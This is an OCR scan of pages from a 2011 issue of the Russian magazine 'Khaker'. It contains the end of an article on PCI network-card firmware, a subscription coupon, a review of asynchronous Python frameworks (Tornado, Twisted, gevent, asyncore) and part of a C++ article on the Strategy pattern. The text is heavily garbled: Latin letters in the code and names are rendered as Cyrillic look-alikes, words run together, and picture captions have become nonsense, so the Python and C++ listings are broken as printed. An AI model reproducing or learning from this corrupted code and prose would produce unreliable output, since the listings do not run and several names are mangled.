позволил нагнуть все сетевые карты разом, не существует. Производи- 
телей множество, и запилить программу, которая будет контролировать 
все сетевые карты подряд, невозможно. Для этого, кактыуже понял, 
нужно знать конкретные особенности конкретной сетевой карты — 
ведь сколько разработчиков, столько и разных форматов ЕЕРРОМ, 
регистров, ну и, разумеется, бгтѵѵаге. Нужно хорошо разбираться в 
принципахдействия шины РСІ и самой операционной системы. 

Вместо заключения 

Согласен: выбирать путь заражения или контроля за РСІ-ЬазесІ- 
устройствами таким вотспособом —удел немногих извращенцев. 

Нет, я отнюдь не призываю тебя присоединяться к извращенцам, од- 
нако системный кодинг в этом направлении поможеттебе понять, как 
работаетсистема на уровне аппаратного железа. Поверь, это крайне 
увлекательное занятие :). Удачного компилирования, и да пребудете 
тобой Сила! т 
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ОДПИСКА 



1. Разборчиво заполни подписной купон и 
квитанцию, вырезав их из журнала, сделав 
ксерокопию или распечатав с сайта зЬор. 

діс.ги . 

2. Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных 
документов — купона и квитанции — 
любым из нижеперечисленных способов: 

• на е-таіі: зиЬзспЬейдІс.ги : 

• по факсу: (495) 545-09-06; 

• почтой по адресу: 1 1 5280, Москва, 

ул. Ленинская Слобода, 19, Омега плаза, 

5 эт., офис № 21 , 

ООО «Гейм Лэнд», отдел подписки. 

Внимание! Если произвести оплату в сентяб- 
ре, то подписку можно оформить с ноября. 

Единая цена по всей России. Доставка 
за счет издателя, в том числе курьером 
Москве в пределах МКАД 






12 НОМЕРОВ - 2200 руб 
6 НОМЕРОВ - 1260 руб. 

УЗНАЙ, КАК САМОСТОЯТЕЛЬНО ПОЛУЧИТЬ ЖУРНАЛ 
НАМНОГО ДЕШЕВЛЕ! 




+ 



ПРИ ПОДПИСКЕ НА КОМПЛЕКТ 
ЖУРНАЛОВ 

ЖЕЛЕЗО + ХАКЕР + 2 0Ѵ0: - ОДИН 
НОМЕР ВСЕГО ЗА 162 РУБЛЯ 
(НА 35% ДЕШЕВЛЕ. НЕМ В РОЗНИЦУ) 



ЗА 12 МЕСЯЦЕВ 3890 РУБЛЕЙ (24 НОМЕРА) 

ЗА 6 МЕСЯЦЕВ 2205 РУБЛЕЙ (12 НОМЕРОВ) 

ЕСТЬ ВОПРОСЫ? п иши на іпГойдІс.ги или звони по бесплатным 
телефонам 8(495)663-82-77 (для москвичей) и 8 (800) 200-3- 
999 (для жителей других регионов России, абонентов сетей 
МТС, БиЛайн и Мегафон). 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ «ХАКЕР» 

□ на 6 месяцев 

□ на 12 месяцев 

начиная с 2011 г. 



I — I Доставлять журнал по почте 
1 — 1 на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

□ на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 



Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ^ ) 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ОАО «Нордеа Банк», г. Москва 

р/с N° 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2011 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордеа Банк», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2011 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 








ВЕБ ПО-АСИНХРОННОМУ 

Обзор асинхронных фреймворков для РуОіоп 

о Асинхронный фреймворк - это ключ к тому, чтобы твое крутое 
веб-приложение могло обрабатывать сразу тысячи одновременно 
висящих клиентов даже на средненьком дедике. Звучит 
фантастично? Поверь мне, это правда! 



Что за зверь? 

Прежде чем окунуться в омутфреймворков, я хочу поведать отом, что же 
на самом делетакое «асинхронность». 

Современные методы программирования в большинстве своем 
базируются натакназываемом синхронном стиле (выполнении кода 
построчно, шагза шагом, линейно]. Для болееясного понимания пред- 
ставим веб-сервер, который получает запрос от клиента, и пока сервер 
обрабатывает один запрос, другие клиенты должны будут ждать конца 
выполнения, итолько после этого до нихдойдеточередь. Согласись, это 
далеко не самый эффективный способ. Если ты в теме, то можешь воз- 
разить мне и сказать, что человечество давноуже придумало потоки. Но 
в потоках скрывается куда больше проблем, чем они способны решить. 
Представьсебе Ютысяч одновременныхсоединений, и следовательно, 
Ютысяч потоков. Создание огромного количества потоков просто- 
напросто поглотит всю оперативную память компьютера, не говоря уже о 



быстродействии процессора между переключением контекста — налицо 
явная 005-атака. Наиболее эффективное решение обработки тысячи 
одновременных соединений — это, несомненно, асинхронные сокеты. 
Асинхронный стиль, онже неблокирующий, часто называютсобытийно- 
ориентированным. Представим себе код: 

5 = зоскеі: . воске1:( . . . ) 

5 . 5е±Ыоскіп§(І5ВІ_0СКІМе) 

5 . соппес1і( (Ііовѣ у рог"Ь) ) 
сІа1:а = 5.гесѵ(1024) 

# какой-то другой код 

5 . СІ05Ѳ ( ) 

В коде видно, что пока данные с сокета не будут получены, следующий 
за ним код не будет исполнен. Асинхронныйже код после запроса 



► 114 



ХАКЕР 09 /1 52/ 201 1 






О '4 * Л11Р 1* 1 



Л- 



© 1*1 



фТѵѵііЬей Маігіх І_аЬ$ 



і 





\ -т 


Ео^піоасі 






іатіггі 11 ! " Глт Руі 

ііг* мир 
ііѵ^-ѵгіііпіі &И! 





ШдГ. в Тѵлхіёё? 

I •*•.■■» С кЕ ЛЛ ііИМ^ПіМ ММПП| МфѴі* ІІРяГі Ій я/й Ікіі'иМ і ЛАН ГГнр < МІ 

ІН. 

и* ** САД ^ ПЛЗіімі »м ТНрМ 

іі У*Ц| -*лг и да; іипгі «л Т«ЩН, тМ Ііцт 0**4 ДО * Ір чй гч ЪИы.Л Свь. 
ОвннімМЬи. 

ТіИіма № II И Ѵігквиі^ н «огг тсі, и», 0Ш1Ъ или шмп, а Оц* 

ртш-л НТТР, ККГ а, ил#, цн, іы. в». ^ -л-ч], «і т.** п«г. 

фМ Угіи 

ЗімлНпПіпнггіе* 



■ ■ &*ТІГ 

* Інгштяпіліжт , ГтДОЧфН *©Ф< I* I# |И 
1 ІЫ !Мр ■ Йаміі Сч Г«ІІМ'П№ шй й**іМ- ч* тгіЧ Чьіэ 

■ '.И Г і . Ѵпл Цгі №#11 Пн йЬбиИ АПІІКІ 

«-' ТтаФмг * и*?4П і №§ щг гвдн4 ш [Ъ|44гі^*п Ь чфіпИІ 

ЦП НиМйтНрх 



5 25 






**** 



'іѵкні им сЧ ^іпрЛпьі ЬгЬаЪ 
Р#П*П4І ІИЧІІСИЗ *ф^* 
іСйаѣѵУі№> Гн Мт? 4шНн ій іі Ыѵя 
ЬГИСй I" . - ѵ# щ*і й\ЦІЬ? ѵМ Ьфі МП 

Р «* Ы|І- 



□ 4^0 

Серьезность сайта ТѵѵізГесІ говорит о серьезности фреймворка 



ТЕМАТИЧЕСКИЕ ССЫЛКИ 



• ІогпасІоѵѵеЬ.огс — официальный сайт фреймворка Тогпасіо. 

• Іѵѵізіесіппаіхіх.сопп — сетевой асинхронный швейцарский нож 
ТѵѵізІесІ. 

• .і пісогп.огд — ѴѴ50І РуФоп-сервера. 

• — сетевая библиотека, основанная на библиотеке ІіЬеѵ- 
епТ. 

• пісбоі.аз — азупсЬгопоиз-зегл/егз-іп-руіФоп-тест на 
производительность сетевых неблокирующих фреймворков на 
РуіЬоп. 

• усоп.Ыір.Іѵ — видео с конференции РуСоп. 

данных не ждет ответа, а сразу передаетуправление дальше, поэтому, 
кактолько сервер соизволит ответить, мы об этом узнаем и какследует 
обработаем его ответ. То есть, концепция асинхронного программи- 
рования заключается втом, что ты пишешь код, который реагирует на 
определенные события — например, когда клиент подключен/отклю- 
чен/готов к приему сообщений и так далее. Неблокирующий сетевой 
ввод-вывод в разных операционных системах реализуется по-разному. 
Например, в ѴѴіпбоѵѵз этозеІесШ, в ЫпихероЩ), роЩ), а во РгееВБй 
это кциеиеО. Помнится мне, что в одном из старых выпусков журнала ][ 
многоуважаемый Михаил Флёнов, он же ЬогіТТіс, рассказывал отом, как 
написать самый быстрый в мире сканер портов. Очень советую отыскать 
тебе эту статью и какследует понять описанные в ней механизмы [ хакер. 
ги/тада2Іпе/ха/042/058/1 .азр — какже давно это было... — прим. ред.). 
Именно эти механизмы позволяютнам обрабатыватьтысячи одновре- 
менно открытых сокетов в рамках одного процесса, а, следовательно, и 
одного главного потока. Но стоит отметить, что такой подходскрываетв 
себе и подводные камни, о которых я расскажу в конце статьи. Асейчас 
приступим непосредственно кобзору инструментария. 

Зверинец фреймворков 

Куда же без их, родимых? Для РуіЬоп-программистов на интернет- 
рынке существует огромное количество интересных фреймворков — как 
асинхронных, так и синхронных. Из последних, пожалуй, стоит выделить 
всеми известный и попсовый фреймворк 0 ] а п д о , о котором ][ писал не 
такдавно. Но сегодня речь не о нем (точнее, нетолько о нем). Итак, что 
же у нас есть на сегодняшний день? 



Тогпасіо 

Стоит отметить, чтоуданного фреймворка весьма интересная история. 
Изначально он писался для внутреннего использования сервисом 
РгіепбРееб. Позже, когда сервис был выкуплен в 2009 году социальной 
сетью РасеЬоок, ребята решили выложить исходные тексты этого заме- 
чательного инструмента. Натекущий моментТотабо имеетнебольшое, 
но дружное сообщество разработчиков и пользователей, которые 
активно обсуждают и поддерживаютлюбимый фреймворк. Доказатель- 
ством моих слов служит недавний стабильный релиз второй версии 
Тогпасіо. Пожалуй, одним незначительных минусов этого неблокирую- 
щего аппарата является отсутствие внятной документации, отсюда и не 
столь его большая популярность по сравнению с 0 ] а п д о , где докумен- 
тация просто сказочная. Но для настоящего пито ни ста это не должно 
быть преградой, ибо мы не ищем легких путей! Тем более, что читать 
исходный кодТогпабо очень приятно — он красиво и корректно написан. 
А совмещать приятное с полезным вдвойне приятно, тем более, что кода 
совсем немного. Кстати, если ты работал с микрофреймворком ѵѵеЬ.ру, 
тоТогпабо покажется оченьзнакомым, в нем сочетаются те же самые 
простота и эффективность :) — за примерами можно обратиться к папке 
бетоз в архиве фреймворка, благо, ихтам достаточно. 

Такчто жеу него внутри?Чем онтакпривлекаетнемалое количество 
профессионалов среди веб-разработчиков?Тогпабо по праву можно на- 
звать полноценным веб-инструментом. В нем отлично поддерживается 
парадигма МѴС (тобеі-ѵіеѵѵ-сопігоііег), обращаетна себя внимание 
весьма серьезный по скорости встроенный шаблонизатор схорошим 
синтаксисом шаблонов, похожим на синтаксис шаблонов О]апдо. 
Приятным плюсом для меня был и набор модулей для авторизации на 
популярных социальных сервисахтипа ТѵѵіФег, РасеЬоок, Ѳоодіе — сей- 
часоченьмоднолепитьтакиефишки на сайтах, дабы не посылать юзера 
через дебри этапов регистрации. Благо нынчеу каждого компьютеризи- 
рованного человека есть хотя бы один аккаунт в этих сетях. Относитель- 
но работы с базой данных разработчики проявили некоторый агности- 
цизм и по умолчанию поддерживают работу только с МуЗОЦ которая 
всецело построена в блокирующем стиле, поэтому практически все 
плюшки асинхронной работы Тогпабо исчезают, еслиты пишешьвеб- 
приложение, которое взаимодействуете МуБОЬ-базой, хотя попытки 
написания стабильного асинхронного драйвера продолжаются. Из этой 
ситуации есть выход — использовать РозІдгеБОЦ который явно быстрее 
МуБОЬи в последних релизах поддерживает асинхронную обработку 
запросов. 
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База интересных сниппетов от сообщества Тогпасіо 



Простейший Неііо ѵѵогісі вТогпасІо выглядиттак: 

НеІІоѵѵогШ на Тогпасіо 

ітрогі: Тогпасіо. іоіоор 
ітрогі: ІіоппасІо.ыеЬ 

с1а55 МаіпНапсІ1ег(1:оппасІо.ыеЬ.Керие5І;НапсІ1еп) : 
сіе-р §е1:(5еТР) : 

зеІТ.ыгіІіеС'НеІІо^ ыопІсГ) 

арріісаііоп = Тогпасіо. ыеЬ. Арр1іса1:іоп ( [ 

(г"/", МаіпНапсІІег) , 

]) 

ІТ пате == " таіп " : 

арр1іса1:іоп.1І5І:еп(8888) 

іогпасіо . іоіоор . І01_оор . іпв1:апсе( ) . БіагіД ) 

Запускать данный скриптможно прямо в консоли — Тогпасіо действи- 
тельно многоеунаследовал отѵѵеЬ.ру в плане простоты. В его поставку 
входит весьма неплохой Ыір-сервер, который лучше всего запускать 
за ГгопІ-епсІ-сервером вроде пдіпх, для более стабильной и эффектив- 
ной работы твоего веб-приложения. Для более детального ознаком- 
ления с его спецификациями советую сходить на официальный сайт 
фреймворка. 

ПЛЮСЫ: 

1 .Достаточно низкий порогвхода, чтодаетзначительное преимущество 
перед остальными фреймворками. 

2. Весьма легкий для чтения и понимания код, нетпрактически ничего 
лишнего. 

3. Внушительно быстрая обработка тысяч одновременно открытых 
соединений. За конкретными тестами милости прошу влинки.указан- 
ные мной во врезке. 

МИНУСЫ: 

1 . Отсутствие внятной документации. 

2. Тогпасіо беден на сторонние библиотеки, хотя это вопрос времени. 

Тѵѵізіесі 

Пожалуй, Тѵѵізіесі по праву можно назвать«швейцарским ножом»для 
любого сетевого программиста на Руібоп. Это настолько огромный 



монстр с внушительным функционалом, что о большем и мечтать нельзя. 
Он поддерживает работу с целым зоопарком протоколов: ТСР/ШР, 55І_/ 
ИЗ, НТТР, 55Н, РТР, ІРС, ЫЫТР.ХМРРи еще кучей всего остального. 

Из плюсов Тѵѵізіесі стоит выделить весьма богатую библиотеку, а также 
внятную и обширную документациюс практическими примерами. Чисто 
с моей точки зрения, Тѵѵізіесі — это целая платформа, изучение которой 
требуетнемало времени и практики, но оно того стоит, еслитытакили 
иначе вовлечен в удивительный мир сетевого кодинга. Кстати, о Тѵѵізіесі 
написана не одна книга, что лишний раз подтверждает серьезность 
фреймворка. Обратной стороной медали является тот фа кт, что любая 
большая система чаще всего является сложной. Увы, Тѵѵізіесі — не ис- 
ключение. Помимо сложности изучения, Тѵѵізіесі значительно усту- 
пает по скорости обработки соединений вышеупомянутомуТогпабо. 

О многочисленныхтестах, которые проводились между различными 
неблокирующими фреймворками Руібоп.ты можешьузнать из линков в 
конце статьи. Также стоит отметить, что разрабатывать веб-приложение 
наТѵѵізІесІ, какв плане написания, таки в плане развертывания, на 
порядок сложнее, чем в Тогпасіо. Тѵѵізіесі не та к просто (по сравнению с 
Тогпасіо или тем же О)апдо) интегрировать с базой данных — в его кон- 
курентахльвинуюдолю работы на себя беретфреймворк — даже в части 
создания таблиц и формирования 5СП_-запросов. 

ПЛЮСЫ: 

1 . Очень богатая библиотека. 

2. Отличная документация. 

МИНУСЫ: 

1. Судя потестам, является далеко не лидером в быстродействии. 

2. Достаточно высокий порог вхождения. 

Оипісогп+Оеѵепі 

Об этой связке, пожалуй, знают не та к много РуІбопѵѵеЬ-разработчиков, 
поэтомуя решил осветить ее подробнее. Впервыеобэтом альянсе 
я услышал на конференции РуСоп, которая проходила в этом году в 
Атланте. Суть заключается в объединении супербыстрого ѴѴЗОІ-сервера 
Оипісогп с сетевой библиотекой нового поколения Оеѵепі (она также 
включаетв себя встроенный ѴѴБОІ-сервер на основе ІіЬеѵепі). Если быть 
максимально кратким, то сетевая библиотека Оеѵепі дает нам возмож- 
ность писать асинхронный код в синхронном стиле, что, несомненно, 
является весомым плюсом по части трудозатрат. Оеѵепі используеттак 
называемые «гринлеты» («микропотоки») чаще всего внутри главного 
потока, поэтому неудивительно, что разработчик библиотеки в качестве 
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Читабельный код модуля азупсоге 



«планировщика»для этих самых«гринлетов» выбрал давноуже из- 
вестную библиотеку ІіЬеѵепІ (используется в Сбготіит, тетсасбесі), 
которая ктомуже написана на чистом Си, что несомненно сказывается 
на скорости работы. Но, насколько мне известно из официального блога, 
в планируемой версии Оеѵепі собираются использовать уже ставшую 
стабильной и быстрой ІіЬеѵ, лишенную тех ошибок, что присущи ІіЬеѵепЕ 
Практически вся стандартная сетевая библиотека питона написана в 
блокирующем стиле, будьто игШЬ, бірііб или что-то еще. Логично, что 
обычным образом нам бы не удалось заставить их работать в асинхрон- 
ном режиме, если бы не специальный патчингсокетов, который делает 
ѲеѵепЕ Вот, кстати, тебе пример работы с беѵепЕ 

Параллельная загрузка сайтов в Ѳеѵепі 

игІ5 = [ , біір://мл/1л/.§оо§1е.сот , ' біір://мл/іл/.уапсІех. ги ' , 

' И1:1:р : //ыыы . руіііпоп . ог§ ' ] 

ітрогі: §еѵеп1: 

-Ргот §еѵеп1: ітрогі: топкеу 
топкеу. ра1:сИ_а11 ( ) 

ітрогі: иг11іЬ2 

сіе-р ргіп1:_ІіеасІ(иг1) : 

ргіпі: ( 'Адрес %5 ' % игі) 

сіаіа = иг11іЬ2.иг1ореп(иг1) . геасІ() 

ргіпі: ('%б: %5 байт: %г' % (иг1, 1еп(сІа1:а)., сІа1:а[ : 50] ) ) 

З'оЬб = [§еѵеп1:.5раіл/п(ргіп1:_ІіеасІ., игі) -Рог игі іп игів] 

§еѵепі:. доіпаІЦдоЬБ) 

Как видно из листинга, написание асинхронного кода с Ѳеѵепі 
очень похоже на синхронный стиль программирования. Ты навер- 
няка заметил, что функция топкеу.раІсРщаЩ) выполняетза нас всю 
«грязную» работу — какяуже написал ранее, она патчит стандартную 
сетевую библиотеку питона, тем самым превращая синхронный код в 
асинхронный. Например, библиотека игШЬ2 из стандартной поставки 
рептилии, которая с помощью «манкипатчинка» превращается в 
неблокирующую, тем самым повышая скорость обработки за счет 
параллельной работы. 



ПЛЮСЫ: 

1 . Облегчение написания и понимания кода. 

2. Достаточно высокая скорость работы. 

МИНУСЫ: 

1 . Манки патч инг работает далеко не со всеми библиотеками. 

2. Функциональный стиль кода, чтотребуетпривыкания. 

Нативный азупсоге 

Далеко не все питонисты обращаютвнимание нато, что в стандартной 
библиотеке питона есть такой замечательный модуль, каказупсоге. 
Азупсоге позволяет писать код в событийно-ориентированном стиле 
(использованиетакназываемыхсаІІЬаск’ов), что, впрочем, далеко не 
все любят. Библиотека азупсоге предназначена для настоящих хард- 
корныхпитонщиков, страдающих ЫІН-синдромом ( N 1 Н — поі іпѵепіеб 
беге], но никто не говоритотом, что это плохо. Мое личное мнениеза- 
ключается втом, что нужно хорошо разбираться в инструментах, которые 
ты используешь, и именно эта библиотека дает неплохой шанс освоить 
тонкости асинхронного программирования, тем более, что ее код очень 
приятен и понятен. С ее помощью утебя есть возможность написать 
собственный крутой сервер по параллельной обработке множества за- 
просов — кпримеру, балансер. 

И это все? 

Нет! В Сети ты можешьнайти еще уйму различных сетевых асинхрон- 
ныхфреймворков для нашего любимого питона, у каждого из нихесть, 
несомненно, плюсы и минусы. Асинхронность — это круто ровно до тех 
пор, пока тебе не нужно будет выполнить какой-то сложный по ресур- 
созатратам код: выборка из огромной базы данных, поискфайлов итак 
далее, так как в этом случае наш поток будет надолго занят, а клиенты 
будут вынуждены ждать. Все это следствие синхронного подхода в 
решении проблем. Еще должно пройти достаточно много времени, пока 
современные методы программирования перейдутна асинхронный 
лад, так какэто требует переписывания огромного количества кода в 
достаточно неудобном стиле. Ачто насчет инструмента? Помни, мой 
друг, что преждевременная оптимизация работы приложения — не 
есть добро. Знай, что лучше написать, а потом оптимизировать, нежели 
гнаться за скоростью и в итоге так ничего путного и не написать. Если 
ты получаешь огромноеудовольствие отнаписания своего очередного 
шедевра на 0]апдо,то пиши на нем. В конечном счете, мы — одни из тех 
немногих, кто действительно счастлив, работая...^ 
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Программерские 
типсы и триксы 

Обзор асинхронных фреймворков для РуІНоп 

О Для того чтобы стать хорошим ООП-программистом, мало знать, что такое инкапсуляция, поли- 
морфизм и наследование. Нужно уметь нечто большее. Создание крупных приложений переводит 
обычного кодера в звание проектировщика, а это, в свою очередь, подразумевает умение мыслить 
глобально и видеть весь проект целиком. Любой архитектор ПО должен знать множество стан- 
дартных паттернов проектирования и уметь распознавать места, в которых их можно применить. 
Сегодня мы познакомимся с одним из паттернов и поймем, насколько классическое ООП несовер- 
шенно и беспомощно. 



Объектно-ориентированное программирование позволяет создавать 
сложные приложения, код которых при этом достаточно просто читать, 
сопровождать и расширять. При правильном использовании ООП за- 
частую можнозначительноуменьшить количество комментариев. Но, 
ксожалению, базовые принципы ООП (инкапсуляция, полиморфизм 
и наследование) зачастую не могутобеспечитьту гибкость, которая 
требуется для активно развивающихся систем. В свою очередь это 
приводит клогическим ошибкам, дублированию кода и неэффектив- 
ной архитектуре. Поэтому для более-менее серьезных проектов спецы 
в области ООП предпочитают использовать разнообразные паттерны 
проектирования, которые позволяют без особыхусилий обеспечить 
повторное использование кода. Собственно повторное исполь- 
зование кода — это одна из причин, благодаря которой объектно- 
ориентированное программирование сталотак популярно. 

Если кто-то сомневается, что все эти конструкторы, деструкторы, 
виртуальные функции и прочие 00-штуки не могут полностью пере- 
крыть все потребности в современном программировании, то я при- 
веду простой пример, который поможет в это поверить. 

Итак, представь, что ты создал интерактивный каталогсотовыхтеле- 
фонов. Это — твой бизнес, он приносит деньги, и его надо развивать. 
Тем более что индустрия мобильных звонилок не стоит на месте и 
тоже движется вперед семимильными шагами. Все было хорошо, 
когда мобилки были простыми, имели монохромные дисплеи и по- 
лифонические мелодии. В те времена код твоего каталога выглядел 
примерно так: 

Иерархия классов мобильных телефонов 

сІаББ МоЬіІеРЬопе 

{ 

риЬІіс : 

ѵоісі сІІ5р1ау() = 0; 
ѵоісі таке5оипсІ() 

{ 

//код воспроизведения мелодии вызова 

}; 

} 

сІаББ ІМокіаЗЗІѲ : риЫіс МоЬіІеРЬопе 

{ 

ѵоісі сІІ5р1ау() 



{ 

// код вывода телефона на дисплей 

}; 

} 

сІаББ БіетепБАЗБ : риЫіс МоЬНеРбопе 

{ 

ѵоісі сІІ5р1ау() 

{ 

// код вывода телефона на дисплей 

}; 

} 

Здесь у нас есть базовый класс МоЬіІеРЬопе, который описыва- 
етдва общих для всех потомков метода: сПзрІауО и такеЗоипсК). 
Причем такеЭоипсІ имеет сразу и реализацию, ведь все трубки 
умеют воспроизводить только полифонию. А вот сіізріау являет- 
ся абстрактным методом, каждый дочерний класс реализует его 
по-своему, так как каждая мобилка имеет свой неповторимый и 
сногсшибательный дизайн. 

И всеутебя было хорошо до тех пор, пока в телефонах не стали появ- 
ляться фотокамеры, а вместе с ними и трЗ- мелоди и. И если трЗты 
еще хоть как-то мог игнорировать (есть звук при звонке — и ладно), 
то отсутствие возможности запечатлеть любимую кошечку пользова- 
тели простить не смогут. Атутеще и конкурент объявился, у которого 
и трЗ работает, и фотикфоткает. Надо что-то делать! 

Классический ООП-подход 

Первое, что приходит в голову — добавить метод такеРЬоІо в 
базовый класс МоЬіІеРЬопе. Идея в принципе неплохая, если не 
считать того, что ІЧокіа 3310 вдруг каким-то образом научилась 
фотографировать :). 

Добавляем метод такеРЬоІо 

сІаББ МоЬіІеРЬопе 

{ 

риЫіс : 

ѵоісі сІІ5р1ау() = 0; 
ѵоісі таке5оипсІ() 

{ 
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УМЬдиа граммы помогают разобраться в хитросплетениях связей между классами 



//код воспроизведения мелодии вызова 

}; 

// добавляем метод фотографирования 
ѵоісі такеРбо1:о() 

{ 

//код для фото 

}; 

} 



ІМокіаЗЗІѲ тоЬіІеРІіопе; 

// Кирпичик от ІМокіа научился фотографировать 
// Так быть не должно 
тоЬіІеРІіопе . такеРІіо1:о( ) ; 

Такой подход в данном случае совершенно неприемлем. У нас есть 
несколько тысяч трубок без фотокамеры и в будущем бесконечное 
множество мобилокс фотиками. Причем бюджетные модели с 
минимальным набором функций (читай — только звонят и отправ- 
ляютВМ5)тоже никто не отменял. Можно, конечно, переопределить 
метод такеРЬоІо в телефонах, которые не умеют делать цифровые 
снимки, но это не наш метод, поскольку могут возникнуть ошибки, да 
и править несколько тысяч классов слишком лениво. И, кстати, у нас 
еще же висят в воздухе трЗ-звонки. Напрягаем мозг и придумываем 
новый архитектурный изыск. 

Используем интерфейсы 

Для того чтобы избежать проблем, которые у нас возникли при ис- 
пользовании стандартного механизма наследования, можно попро- 



бовать использовать интерфейсы —то есть сущности с описанием, 
но без реализации. Во многих языках программирования интерфей- 
сы поддерживаются на нативном уровне, например, в Оаѵа или РНР, 
но в С++ такое понятие отсутствует. Но это не является большой про- 
блемой, так как множественное наследование и абстрактные классы 
успешно справляются со всеми обязанностями интерфейсов. 
Создадим абстрактный класс (интерфейс) іРЬоІоСаппега, который 
будет описывать метод такеРЬоІо. При этом не забудем убрать его 
из класса МоЬіІеРЬопе. Теперь только мобильники с фотокамерами 
будут наследовать интерфейс іРЬоІоСатега, и наша «Нокиа 3310» 
уже не будет поражать всех пятимегапиксельными снимками. 

Использование интерфейса іРНоІоСатега 

сІазБ іРбоіоСатега 

{ 

ѵоісі такеРІіо1:о() = 0; 

} 



сІазБ МоіогоІаІ-9 : риЫіс МоЬіІеРІіопе, риЬІіс іРбоіоСатега 

{ 

ѵоісі такеРбоіоО 

{ 

// код, отвечающий за фото 

}; 

} 

сІазБ МоіогоІаІ-7 : риЬІіс МоЬіІеРІіопе, риЬІіс іРбоіоСатега 

{ 
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Применять паттерны можно и в С++ 

ѵоісі такеРІіо1:о() 

{ 

// код, отвечающий за фото, такой же., как и для МоіогоІаІ-9 

// Дублирование кода 

}; 

} 

Все, казалосьбы, хорошо, но мы неучли одну вещь — интерфейс 
предоставляет толь ко описание методов, но не их реализацию. Аэто 
значит, что нам надо будет в классе каждой звонил ки реализовывать 
такеРЬоЫ). Из-за этого мы получим дублирование кода и кучу потен- 
циальныхошибок. Конечно, в срр можно схитрить и прикрутить реали- 
зацию такеРЬоІо в классе іРЬоІоСатега, но даже несмотря на то, что 
тогда этот класс перестанет быть интерфейсом, мы все равно не решим 
проблему. Ведь камеры бывают разные: с автофокусом и без, с СМ05 
матрицей и ССй... Отвсехэтих параметров будетзависеть реализация 
ппакеРЬоІо, и определять один метод для всех классов просто нельзя. 
Очередная неудача, номы уже близки к правильному решению. Еще 
немного скрипа мозгов — и все будет работать как надо. 

Паттерн «Стратегия» 

В основе любого паттерна проектирования лежит принцип, который 
требует отделить изменяющиеся куски кода от постоянных. Мы это 
уже практически сделали, перенеся функционал фотокамеры в 
отдельный интерфейс. Мы выделили аспект поведения, определив 
абстрактный класс іРЬоІоСаппега, но не изолировали алгоритмы, ре- 
ализующие этот аспект. Другими словами, код функции такеРЬоІо 
надо тоже вынести из иерархии классов сотовыхтелефонов. 

Сделать это довольно просто — надо лишь определить несколько 
субклассов, базовым для которых является ІРЬоІоСаппега. На С++ это 
будет вы глядеть та к: 

Выносим такеРГіоІоО из иерархии классов сотовыхтелефонов 

сІавБ іРбоіоСатега 

{ 

ѵоісі такеРІіо1:о() = 0; 

} 

сІаББ ОоРбоІіо : риЫіс іРбоіоСатега 

{ 

ѵоісі такеРІіоіоО 

{ 

// код, отвечающий за фото 

}; 

} 

сІавБ СаігШоРІіоіо : риЫіс іРбоіоСатега 

{ 



ѵоісі такеРбоіоО 
{ 

// пустой метод 

// для мобилок., которые не умеют фотографировать 

пеіигп; 

}; 

} 

Как видно из кода, мы создали два класса: ОоРЬоІо и СапШоРЬоІо. 
Оба они наследуют интерфейс іРЬоІоСатега и реализуют метод 
такеРЬоЫ). Таким образом, мы выделили аспект поведения (спо- 
собность фотографировать) и закрепили за этим аспектом алгорит- 
мы. Класс РоРЬоІо способен делать снимки, а СапЮоРЬоІо — не 
способен, и тело ппакеРЬоІо остается пустым. 

Мы разделили все мобильники на две группы и при этом избежали 
проблем, которые возникали при использовании предыдущих под- 
ходов. Нет дублирован ия кода, нет логических ошибок в духе «3310 
обзавелся фотокамерой». Также можно поступить и с воспроизведе- 
нием трЗ-мелодий. 

Выносим реализацию трЗ и полифонии 

сІаББ іРІіопеБоипсІ 

{ 

ѵоісі таке5оипсІ() = 0; 

} 

сІаББ РоІурбопуБоипсІ : риЫіс іРбоІіоБоипсІ 

{ 

ѵоісі таке5оипсІ() 

{ 

// код., воспроизводящий полифонические мелодии 

}; 

} 

сІаББ МрЗБоипсІ : риЫіс іРбоІіоБоипсІ 

{ 

ѵоісі таке5оипсІ() 

{ 

// код., воспроизводящий трЗ 

}; 

} 

Принцип тут тонн о такой же, как и с фотокамерой. Мы опреде- 
лили интерфейс іРЬопеЭоипсІ и реализовали в суб классах 
РоІурбопуЭоипсІ и МрЗЭоипсІ метод такеЭоипсН). Такой подход, 
помимо решения перечисленных выше проблем, позволяетеще и 
менять поведение мобилок на лету, в процессе выполнения кода. 

Это на самом деле очень полезно и обеспечивает большую гибкость 
архитектуры. Мобильники с возможностью воспроизведения трЗ 
могут также хорошо пропищать что-нибудь в свой полифонический 
синтезатор. Пользователям нашего каталога может прийти в голову 
прослушать этот писк, и изменение поведения объекта на стадии 
выполнения нам очень пригодится. 

Но радоваться еще рано. Надо как-то привязать вновь созданные 
интерфейсы к классам мобильныхтелефонов. Для этого в базовом 
классе МоЬіІеРЬопе объявим две переменные, одна из которых будет 
и меть тип ІРЬопеСаппега, а другая — ІРЬопеЭоипсІ. 

Интеграция поведения с классом МоЬіІеРНопе 

сіэбб МоЬіІеРІпопе 

{ 

ргоіесіесі : 

іРбоіоСашега &рІіо1:оВеІіаѵіог; 
іРІіоіоБоипсІ &5оипсІВеІіаѵіог; 

риЫіс : 



► 120 



ХАКЕР 09 /1 52/ 201 1 




На Ъѵа часто пишут особо крупные серверные 
приложения. Грамотное построение архитектуры 
там просто необходимо 

ѵоісі сІізрІауО = 0; 
ѵоісі таке5оипсІ() 

{ 

